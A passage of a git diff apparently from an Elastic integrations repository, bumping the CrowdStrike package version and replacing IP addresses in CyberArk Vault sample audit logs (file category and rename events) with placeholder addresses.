Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"208.30.227.225\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" + "ingested": "2021-12-09T13:36:11.151397900Z", + "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" }, "crowdstrike": { "SystemProductName": "MacBookPro16,2", diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 10227b44906..7ad725c64c4 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml @@ -1,6 +1,6 @@ name: crowdstrike title: CrowdStrike Logs -version: 1.1.0 +version: 1.1.1 description: Collect and parse falcon logs from Crowdstrike products with Elastic Agent. type: integration format_version: 1.0.0 diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log index cb662d0ec48..5c630248bf1 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log index 14adbc29da4..f6be50ea2bc 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.13\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.13","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log index 92fadaab728..2d3df674fa8 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log @@ -1 +1 @@ -<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log index b3191445d81..14e3f7ea832 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log @@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log index d9c83a42d98..0fcaa02b4dd 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/125_rename_file_cont.log @@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/130_cpm_disable_password.log index 3f6ae5f7871..e07bae4df57 100644 --- 